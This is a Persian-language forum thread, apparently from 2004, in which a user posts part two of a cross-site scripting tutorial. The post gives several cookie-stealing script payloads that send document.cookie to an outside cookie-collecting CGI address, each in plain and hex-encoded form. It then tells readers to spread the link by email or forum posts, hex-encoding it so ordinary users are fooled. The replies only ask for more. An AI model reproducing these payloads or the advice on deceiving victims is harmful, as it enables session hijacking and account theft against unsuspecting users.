Cross Scripting site Attack part 2 XSS

شروع موضوع توسط Meteor ‏8 ژوئن 2004 در انجمن سیستمهای مدیریت محتوای وب سایت

  1. Meteor

    Meteor کاربر تازه وارد

    تاریخ عضویت:
    ‏31 می 2004
    نوشته ها:
    124
    تشکر شده:
    1
    سلام ​
    با اینکه مقاله هنوز خواننده جذب نکرده و پاسخ زیادی نداشته اما مابقی مطلبم را می نویسم .​
    در قسمت قبل نوشتم که نحوه کار XSS به چه شکل هست و شروع کردم به کار حالا مابقی ماجرا ​
    قدم دوم تست کردن بود که توضیح دادم . ​
    و اما مثال هایی از زدیدن کوکی توسط جاوا اسکریپت ​
    ASCII Usage:

    http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> ​
    Hex Usage:

    http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
    %63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
    %69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
    %6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e​
    نکته : این رکوئست(درخواست) اول در حالت اسکی نوشته شده و بعد به منظور کپی و پیست کردنش رفته تو مد هگز​
    1. "><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

    HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
    %6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
    %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
    %63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

    2. <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

    HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
    %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
    %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
    %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

    3. ><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

    HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
    %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
    %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
    %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e​
    اینها چند مثال شیطانی بود که از جاوا اسکریپت استفاده میکرد.این جاوا ها کوکی های کاربر را جمع میکنن و بعد درخواست یا همون رکوئست خودمون را میفرستن به اون سایت که بالا اسمش هست . حالا اون اسکریپتی که روی سایت قرار داره همه این اطلاعات رو ذخیره میکنه خلاصه القصه این کارا انجام میشه :​
    My cookie = user=zeno; id=021
    My script = www.cgisecurity.com/cgi-bin/cookie.cgi
    بعد درخواست را که مثل این یکی هست را میفرسته توی سایت طرف ​
    GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space​
    اما این یکی از راه هایی هست که ازش استفاده میشه تا کوکی های کاربر را جمع کنن . یه مشت از کوکی هایی که توسط عموم جمع شده را توی این آدرس میتونید پیدا کنید . ​
    حالا قدم سوم .XSS Execution​
    حالا این آدرس قر و قاطی را که نوشتین را یه جوری به ملت قالب کنید یا با ایمیل یا همینجا بذارینش تو انجمن بعد هم کلی روش تبلیغ کنین تا ملت بیان و روی اون لینک کذایی بکلیکن . اما مطمئن بشین که وقتی دارین مذارینش رو سایت حتما تبدیلش کنین به هگز . آخه اگه کد را همینجوری بذارین رو سایت خیلی ها راحت میفهمن چه خبره ولی وقتی تبدیلش کنید به هگز اونوقت مردم عادی نمیگیرن که جریان چیه و راحت گول می خورن .​
    توی مثال بالا من فقط کاربر را فوروارد کردم به cookie.cgi یک حمله گر می تونه با صرف وقت بیشتری چند تا ریدایرکت را بذاره تا بتونه کوکی را بدزده و بعد هم بذارتشون یا همون ریدایرکت خودمون ریدایرکتشون کنه یه جای باحال تا طرف کلی کیف کنه و نفهمه که کوکیش دزدیه شده . بعضی وقت ها این چیزا رو یه جوری میذارن توی ایمیل که به محض باز شدن ایمیل اجرا میشه و مابقی ماجرا خلاصه اینکه حواستون باشه که ایمیل های العی را باز نکنین و هر لینکی را کلیک نکنید . مخصوصا که به هگز تبدیل شده باشن . بعضی از سایت های بزرگ مثل HotMail اجازه اجرا به اسکریپت های داخل ملحقات را میدن اما یه چند تایی هم فیلتر دارن که جلوی دزدین کوکی ها رو میگیره . ​
    قدم چهارم با این اطلاعات چه کنیم ؟ میمونه واسه برنامه بعد . اگر دوست داشتین ادامه بدم باید ریپلای بدین .
     
  2. خرید بک لینکبازدیدیار - افزایش بازدید سایت و سیگنال های برند
  3. demon_da

    demon_da Registered User

    تاریخ عضویت:
    ‏21 ژوئن 2004
    نوشته ها:
    106
    تشکر شده:
    0
    منتظر بقيه قسمت هاش هستم!
     
  4. M-r-r

    M-r-r کاربر تازه وارد

    تاریخ عضویت:
    ‏10 فوریه 2004
    نوشته ها:
    381
    تشکر شده:
    0
    محل سکونت:
    in my clothes
    بقیه اونو از توی سایت خودش میتونی پیدا کنی . فقط کافیه روی امضاش کلیک کنی و انجمن های تخصصی اش را باز کنی
     
  5. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    61
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    آقا چه به هگز تبدیلش کنیم؟
     
عسل طبیعی و گرده گل ایرانیخدمات پی پال، وسترن یونیون